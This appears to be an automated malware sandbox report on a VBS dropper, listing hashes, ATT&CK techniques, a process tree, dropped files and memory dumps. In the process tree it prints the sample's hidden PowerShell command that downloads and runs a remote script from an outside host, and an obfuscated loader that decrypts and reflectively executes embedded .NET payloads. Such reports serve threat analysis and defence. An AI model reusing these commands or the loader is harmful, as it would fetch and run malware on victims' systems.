13f879d486e63ba54d45f500025f13cb63c83956e0493434a67692f3a47cbace

General

Target

2570_output.vbs
Size

421KB
MD5

1304afcdfc224427dfe647dd10025628
SHA1

54de753563e6a041ca67a90e50c121cd32f2e125
SHA256

13f879d486e63ba54d45f500025f13cb63c83956e0493434a67692f3a47cbace
SHA512

23dcf2384265354d1596934f5d428df2518a410fd074ac6127c9f6b6ac896472542620966ffe6c39a3e74157f3eb3f09e2d481ee265f969861fcc5f3bbac0506
SSDEEP

6144:URCyzWhqzOEHu+s+7e7C8526sSil7tJA1ikRAG9cuyVa8iix6gwXUhkSn:w8hbmbh7uiWct2yVa8ArUhkSn

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2328	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2328	powershell.exe
2556	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeDebugPrivilege	2556	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2244 wrote to memory of 2328	2244	WScript.exe	31
PID 2244 wrote to memory of 2328	2244	WScript.exe	31
PID 2244 wrote to memory of 2328	2244	WScript.exe	31
PID 2244 wrote to memory of 2540	2244	WScript.exe	33
PID 2244 wrote to memory of 2540	2244	WScript.exe	33
PID 2244 wrote to memory of 2540	2244	WScript.exe	33
PID 2540 wrote to memory of 2648	2540	cmd.exe	35
PID 2540 wrote to memory of 2648	2540	cmd.exe	35
PID 2540 wrote to memory of 2648	2540	cmd.exe	35
PID 2648 wrote to memory of 2884	2648	cmd.exe	37
PID 2648 wrote to memory of 2884	2648	cmd.exe	37
PID 2648 wrote to memory of 2884	2648	cmd.exe	37
PID 2648 wrote to memory of 2556	2648	cmd.exe	38
PID 2648 wrote to memory of 2556	2648	cmd.exe	38
PID 2648 wrote to memory of 2556	2648	cmd.exe	38

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2570_output.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2244
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2328
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2648
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$qITC='LouFPXaduFPX'.Replace('uFPX', ''),'TUSuyraUSuynsUSuyfoUSuyrUSuymFUSuyinUSuyalUSuyBlUSuyockUSuy'.Replace('USuy', ''),'CrzEmWezEmWatezEmWDeczEmWryzEmWpzEmWtozEmWrzEmW'.Replace('zEmW', ''),'InTXcnvTXcnokeTXcn'.Replace('TXcn', ''),'ChavMYCngvMYCeEvMYCxtevMYCnvMYCsvMYCionvMYC'.Replace('vMYC', ''),'FroTZlrmTZlrBaTZlrsTZlre64TZlrStTZlrriTZlrngTZlr'.Replace('TZlr', ''),'CoMOrVpMOrVyTMOrVoMOrV'.Replace('MOrV', ''),'ReahjxadahjxLahjxiahjxneahjxsahjx'.Replace('ahjx', ''),'EoUWdnoUWdtroUWdyoUWdPooUWdioUWdntoUWd'.Replace('oUWd', ''),'EqSJhlemqSJhentqSJhAtqSJh'.Replace('qSJh', ''),'SuRkbpuRkbluRkbiuRkbtuRkb'.Replace('uRkb', ''),'GCJOUetCCJOUurCJOUrCJOUenCJOUtPrCJOUoCJOUceCJOUssCJOU'.Replace('CJOU', ''),'DeajkMcajkMoajkMmprajkMeajkMsajkMsajkM'.Replace('ajkM', ''),'MaasMVinasMVMoasMVduasMVleasMV'.Replace('asMV', '');powershell -w hidden;function gUZuM($CFHEm){$VtKjY=[System.Security.Cryptography.Aes]::Create();$VtKjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VtKjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VtKjY.Key=[System.Convert]::($qITC[5])('gEhsJeRdRC5Ki9l14TCSSipF/1hE8pGPMmODwPyopiw=');$VtKjY.IV=[System.Convert]::($qITC[5])('k4acgMLLeJA4HUn289xcAw==');$pKWcz=$VtKjY.($qITC[2])();$RhEHp=$pKWcz.($qITC[1])($CFHEm,0,$CFHEm.Length);$pKWcz.Dispose();$VtKjY.Dispose();$RhEHp;}function xBAEi($CFHEm){$EdEdU=New-Object System.IO.MemoryStream(,$CFHEm);$pWSoO=New-Object System.IO.MemoryStream;$mpgHU=New-Object System.IO.Compression.GZipStream($EdEdU,[IO.Compression.CompressionMode]::($qITC[12]));$mpgHU.($qITC[6])($pWSoO);$mpgHU.Dispose();$EdEdU.Dispose();$pWSoO.Dispose();$pWSoO.ToArray();}$tlpZd=[System.IO.File]::($qITC[7])([Console]::Title);$sQzRR=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 5).Substring(2))));$OzOEx=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 6).Substring(2))));[System.Reflection.Assembly]::($qITC[0])([byte[]]$OzOEx).($qITC[8]).($qITC[3])($null,$null);[System.Reflection.Assembly]::($qITC[0])([byte[]]$sQzRR).($qITC[8]).($qITC[3])($null,$null); "
      4⤵
      PID:2884
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2556

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\n1.bat

Filesize
420KB

MD5
a21d4680c8d115c444119d6b1ca6aed6

SHA1
fdbb2d3c7eb9ea5c93781f91bf2157d25f82c2f2

SHA256
1f25a0b4e9b17c826aa68d775dab0605edbddf39963943358406285f157b4e9f

SHA512
b3b9ce5c820399bd7f8f80af4300328a5153ae8b15f2b00c85dba1fc983d02e739cae84ded8e831e845443e3226ff778c146598b0089076fcd9ac59830a47452

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
37854cc7a6a23fb77c10d55ad1880cae

SHA1
b5ff9ced170a03b815c81008042d38455ed1f735

SHA256
7e6b3d5ef5fad2f7d3ed75f1a80504970b40f5dfd11a765833d4b7d35a124cc1

SHA512
a2204134fcee141935fd0a1219f56d38fef873b7ed9acb51b2f135c340e787f4851e34c1037e4f5f18a15a70c14c2e4e9176964cb380a952f0d0625cff206c63

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LM93G8WCNUF683KMDH2J.temp

Filesize
7KB

MD5
2dc0e20b1f525e6a0c114c61a6f619ed

SHA1
49d6d975dd2805afd5d3b364e8a79591cb84156c

SHA256
12238b267237860ce3419ed8274fed5dfd9e689499d908a5e0bd9826cb10c959

SHA512
84aac8a29ca7949837c294618fa9133ca3db1fcb523d821f226640262e816a64e96501115d4cbfdde5242821a6c808b235fa6dcaea685f4b3a02cd0ac1b2cd3c

Download Submit
memory/2328-7-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

Filesize
9.6MB

Download
memory/2328-9-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

Filesize
9.6MB

Download
memory/2328-8-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

Filesize
9.6MB

Download
memory/2328-11-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

Filesize
9.6MB

Download
memory/2328-10-0x0000000002DEB000-0x0000000002E52000-memory.dmp

Filesize
412KB

Download
memory/2328-4-0x000007FEF633E000-0x000007FEF633F000-memory.dmp

Filesize
4KB

Download
memory/2328-5-0x000000001B610000-0x000000001B8F2000-memory.dmp

Filesize
2.9MB

Download
memory/2328-6-0x0000000002890000-0x0000000002898000-memory.dmp

Filesize
32KB

Download
memory/2556-27-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

Filesize
2.9MB

Download
memory/2556-28-0x00000000027F0000-0x00000000027F8000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing